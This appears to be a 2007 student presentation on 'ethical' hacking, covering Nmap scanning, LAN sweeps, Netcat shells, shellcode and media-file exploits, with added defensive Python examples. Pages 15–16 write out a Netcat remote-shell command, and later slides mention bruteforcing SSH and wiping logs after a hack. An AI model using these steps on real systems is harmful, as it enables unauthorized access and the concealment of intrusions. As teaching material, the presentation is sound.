
Page 1: Security & ethical hacking p2

Security & “Ethical” Hacking

Luke Arntson

Central Washington University

Winter 2007

Presentation #2 – Advanced Scanning & Exploitation

Page 2

Introduction

Again “Ethical” hacking

Do you sniff before you taste?

Patience, persistence, some other motivational p word…

Have phun, getting frustrated is normal

Page 3

About Me

Page 4

Overview

Advanced scanning with NMAP (as seen in the Matrix)

Local IP Sweeping & its importance

Netcat rooting, a simple shell

Identify Station (operating system)

Brief Exploit talk & Shell code

Exploits via Jpgs, Pngs, Mp3s, etc.

Conclusion

Page 5

Advanced Scanning (NMAP)

Ok, we have acquired an IP (or range of) and we want to find out some information about this system.

We will use a very popular program named Nmap.

Almost every Linux install has it packaged; on Windows you will need to download Nmap and the Win-Pcap files.

Page 6

Advanced Scanning (NMAP)

Let's look at some of the information techniques provided by nmap:

SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idlescan
-sO: IP protocol scan
-b <ftp relay host>: FTP bounce scan

We will be using another scan technique to probe open ports and determine service/versions in use: -sV

Page 7

Advanced Scanning (NMAP)

So let's run a -sV scan along with -v for verbose and -O for OS detection.

Page 8

Advanced Scanning (NMAP)

So lots of gibberish, but we can sort through this for VERY important details!

First: we have all of the open ports, along with what versions they are running! Port 139.. Very interesting.

Second: we also found out the operating system! Windows 98 SE… more on that later.

Page 9

Protection from NMAP

Keep those firewalls up if you’re not a server and you’re not hosting.

There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques.

It is scary how much information can be acquired about you by a simple sniff and run.
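The slide says there is not much you can do about Nmap; on the network side you can at least see it coming. As an added example (not from the slides), here is a minimal port-scan detector in Python run over constructed connection-log lines; the log format, the 60-second window and the six-port threshold are assumptions of the example, not anything the presentation specifies.

```python
"""Port-scan detection over connection logs (added example, not from the slides).

A host that touches many distinct ports on one target in a short window is the
footprint Nmap -sS / -sV leave behind. The log format below is invented for this
example; the logic (distinct destination ports per source/destination pair inside
a sliding time window) is what IDS port-scan rules build on.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "timestamp src_ip dst_ip dst_port tcp_flags"
SAMPLE_LOG = """\
2007-02-01T10:00:00 192.168.5.100 192.168.5.7 21 S
2007-02-01T10:00:00 192.168.5.100 192.168.5.7 22 S
2007-02-01T10:00:01 192.168.5.100 192.168.5.7 80 S
2007-02-01T10:00:01 192.168.5.100 192.168.5.7 139 S
2007-02-01T10:00:02 192.168.5.100 192.168.5.7 443 S
2007-02-01T10:00:02 192.168.5.100 192.168.5.7 445 S
2007-02-01T10:00:03 192.168.5.100 192.168.5.7 3389 S
2007-02-01T10:00:04 192.168.5.100 192.168.5.7 8080 S
2007-02-01T10:00:05 192.168.5.42 192.168.5.7 80 S
2007-02-01T10:05:00 192.168.5.42 192.168.5.7 443 S
2007-02-01T10:09:00 192.168.5.42 192.168.5.7 22 S
"""

def parse_line(line):
    """Split one constructed log line into typed fields."""
    ts, src, dst, port, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), flags

def detect_scans(log_text, threshold=6, window_seconds=60):
    """Return {(src, dst): all ports probed} for every source that hit at least
    `threshold` distinct ports on one destination within any `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)  # (src, dst) -> [(time, port), ...]
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, port, _flags = parse_line(line)
            events[(src, dst)].append((ts, port))

    alerts = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # advance the window start until the span fits inside `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({p for _, p in evs[start:end + 1]}) >= threshold:
                alerts[key] = sorted({p for _, p in evs})
                break
    return alerts

if __name__ == "__main__":
    for (src, dst), ports in detect_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst} ports {ports}")
```

The second source in the sample spreads three probes over nine minutes and stays under the default threshold; lowering the threshold and widening the window catches slow scans at the cost of more noise.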

Page 10

Local IP Sweeping

The LAN is generally the weakest network.

Open ports, open boxes, free IPs, easy sweeps.

The vast majority of people feel other computers within the LAN are not hackers, but compromise a wireless router & bam…

Page 11

Using Angry IP Scanner Again!

Angry IP Scanner: it's script kiddie, but it works very well, and is faster than NMAP.

Let's grab our local IP on the network and begin our scan. We are currently 192.168.5.100, and we know our range is 192.168.5.*

Use Angry IP Scanner just to find available peers on the network; this is VERY useful for a compromised wireless router or compromised system on a router.

Page 12

We Have Local Victims!

Okay, we have local victims; we can now use Nmap on each victim.

Nmap will also bypass firewalls given enough time with the -P0 option.

Once we know operating systems and open ports, we can use online security search tools such as www.securityfocus.com and locate exploits!

Page 13

Importance of Local Sweeps

Compromised routers = compromised systems, vulnerable on the inside only.

Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping.

Viruses often spread within a network (commercial, government, etc.) using LAN sweeps.

Page 14

Netcat Rooting (Simple Shell)

Ok, we want to see what kind of access a shell really has on a system. Shell referring to a command prompt window on another computer.

Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell.

A Windows version is free to download; Linux generally comes with NC in the shell already.

Page 15

Client/Server

Determine which computer you want to have a shell on, and put nc.exe somewhere on there.

Next run nc.exe with the following parameters:

nc.exe -l -p 666 -e "cmd.exe"

This will execute Netcat to listen on port 666, and when connected, it will execute and send the output of cmd.exe on the server.

Page 16

Client Connection

Client now connects to the server using the corresponding line:

nc.exe 192.168.77.2 666

And voilà! Netcat shell over the network.

Page 17

Why Netcat Root?

A nice way to make your first root; easy to expand on this.

Potential is HUGE when the -e "???" command is used.

Netcat is open source, so you can venture into the source code to understand how exactly Netcat does this.

This also works in Unix, just replace cmd.exe with a Unix shell ;)

Page 18

Identify Station

Continuation of Nmap OS discovery

Once we have found a target, what kind of operating system is it running?

The Nmap -O command will usually show you, unless the computer has a firewall on.

Page 19

Importance of OS ID

Exploiting and choice of exploits/roots is always dependent on the type of OS.

Do we want to look for likely exploits, find a more aggressive approach, or leave it? For example, Linux servers often have an SSH server open; we can either nmap -sV and exploit, or try to bruteforce.

Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)

Page 20

Brief Exploits & Shell Code

Exploits come in all sorts of languages & sizes. Some are simple run-once on an IP; others have various options and offsets.

Exploits are used as a way of getting into a system; shell code is what happens AFTER the exploit is successful.

Shell code will always vary with experienced hackers, as they will always have useful shells on hand.

Page 21

Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT


This is machine code, used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system.

This is public knowledge; just type the following in Google:

wuftpd exploit filetype:c

Page 22

More on Shells Later

Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation.

Shells are scary to look at because if you do not know the machine code or the system it's intended for, there is absolutely no way to know what it's doing, but it can compromise a system!
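The slide says that without knowing the machine code there is no way to tell what a shell string does; the first thing an analyst actually does is find every int 0x80 and the syscall number loaded into AL just before it. As an added example (not from the slides), the Python below performs that heuristic scan over constructed syscall stubs (zeroed registers, no arguments, deliberately not a working payload) and also accepts the C-style "\x31\xc0…" string form that exploit listings use; the syscall table is the i386 Linux one.

```python
"""Rough triage of x86 Linux shellcode: list the syscalls it invokes.

Added example, not from the slides. The byte scan is a heuristic, not a
disassembler: it understands only `xor eax,eax`, `mov al, imm8` and
`int 0x80`, and steps over any other byte one at a time, so unusual
encodings or self-modifying code can fool it. SAMPLE_CODE is a constructed
chain of syscall stubs with zeroed registers, not a working payload.
"""

# i386 Linux syscall numbers (subset typical of chroot-escape style code)
SYSCALL_NAMES = {
    0x01: "exit", 0x03: "read", 0x04: "write", 0x0b: "execve", 0x0c: "chdir",
    0x27: "mkdir", 0x3d: "chroot", 0x3f: "dup2", 0x46: "setreuid",
}

SAMPLE_CODE = (
    b"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"  # xor eax/ebx/ecx; mov al,0x46; int 0x80
    b"\x31\xc0\xb0\x3d\xcd\x80"                  # chroot stub
    b"\x31\xc0\xb0\x0c\xcd\x80"                  # chdir stub
    b"\x31\xc0\xb0\x0b\xcd\x80"                  # execve stub
    b"\x31\xc0\x31\xdb\xb0\x01\xcd\x80"          # exit stub
)

def parse_hex_string(text):
    r"""Turn a C-style "\x31\xc0..." literal (possibly several quoted pieces
    separated by spaces, as printed in exploit listings) into bytes."""
    cleaned = text.replace('"', "").replace(" ", "")
    return bytes(int(h, 16) for h in cleaned.split("\\x") if h)

def list_syscalls(code):
    """Return [(offset, number, name)] for each int 0x80, using the value last
    placed in AL (None, reported as 'unknown', if AL was never set)."""
    calls, al, i = [], None, 0
    while i < len(code):
        if code[i:i + 2] == b"\x31\xc0":            # xor eax, eax  -> AL = 0
            al, i = 0, i + 2
        elif code[i] == 0xB0 and i + 1 < len(code):  # mov al, imm8
            al, i = code[i + 1], i + 2
        elif code[i:i + 2] == b"\xcd\x80":          # int 0x80
            calls.append((i, al, SYSCALL_NAMES.get(al, "unknown")))
            al, i = None, i + 2
        else:
            i += 1
    return calls

if __name__ == "__main__":
    for offset, number, name in list_syscalls(SAMPLE_CODE):
        print(f"offset {offset:3d}: int 0x80 with eax={number} ({name})")
```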

Page 23

Exploits via Jpg, Pngs, Mp3s

Exploits come in many varieties, as it just takes a stray string call or a bad size check to make a program vulnerable.

All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!
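The "bad size check" the slide mentions has a concrete shape in JPEG: every marker segment carries a 2-byte length that includes the length field itself, so a value below 2 is invalid, and a decoder that computes length - 2 without checking underflows; that is the class of bug behind the GDI+ JPEG issue named above. As an added example (not from the slides), the Python below walks JPEG marker segments and rejects such a file; both images are constructed byte strings, not real files.

```python
"""JPEG marker walk with the segment-length check a decoder must make.

Added example, not from the slides. Each marker segment after SOI carries a
2-byte big-endian length that counts the length field itself, so any value
below 2 is invalid. The two images below are constructed, not real files.
"""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01} | set(range(0xD0, 0xD8))  # TEM, RST0-7: no length field

def segment(marker, payload):
    """Build one well-formed marker segment (helper for the constructed images)."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

GOOD_JPEG = (b"\xff\xd8" + segment(0xE0, b"JFIF\x00\x01\x01")
             + segment(0xFE, b"ok comment") + segment(SOS, b"") + b"\xff\xd9")
# COM segment declaring length 1: smaller than its own 2-byte length field
BAD_JPEG = (b"\xff\xd8" + segment(0xE0, b"JFIF\x00\x01\x01")
            + b"\xff\xfe\x00\x01" + b"AAAA" + b"\xff\xd9")

def walk_segments(data):
    """Return [(marker, payload_length)] up to SOS/EOI, or raise ValueError."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    out, i = [], 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            raise ValueError(f"expected marker at offset {i}")
        marker = data[i + 1]
        if marker == EOI or marker in STANDALONE:
            out.append((marker, 0))
            if marker == EOI:
                return out
            i += 2
            continue
        if i + 4 > len(data):
            raise ValueError("truncated length field")
        (length,) = struct.unpack(">H", data[i + 2:i + 4])
        if length < 2:  # the check a vulnerable decoder skipped
            raise ValueError(f"segment 0x{marker:02x} declares length {length} < 2")
        if i + 2 + length > len(data):
            raise ValueError("segment runs past end of data")
        out.append((marker, length - 2))
        i += 2 + length
        if marker == SOS:  # entropy-coded scan data follows; stop here
            return out
    raise ValueError("missing EOI marker")

def is_well_formed(data):
    """True if walk_segments accepts the byte string."""
    try:
        walk_segments(data)
        return True
    except ValueError:
        return False
```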

Page 24

GDI+ Jpg vulnerability

Posted on Sept. 30, 2004

“In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected.

Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing.” – Mark Joseph Edwards

http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1

Page 25

Exploits via Jpg, Pngs, Mp3s

Other vulnerabilities in the form of Pngs and Mp3s have come into the wild.

One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded.

A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.

Page 26

Just because it's media…

Just because you're viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer.

Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.

Page 27

Resources

If this type of information interests you, there are many safe online resources.

www.hackthissite.org - a friendly playground for web hackers

www.phrack.org - a very good place for random articles with great pieces of info

www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits.

Page 28

Conclusion

Again, I emphasize: just because I'm showing you this does NOT make it legal. In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about.

Remember, finding exploits that work is tedious; not everything you find online works every time. Set up a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun, it takes work so don't give up!

Page 29

Thank You For Your Time!

Feel free to email me any questions/comments at

[email protected]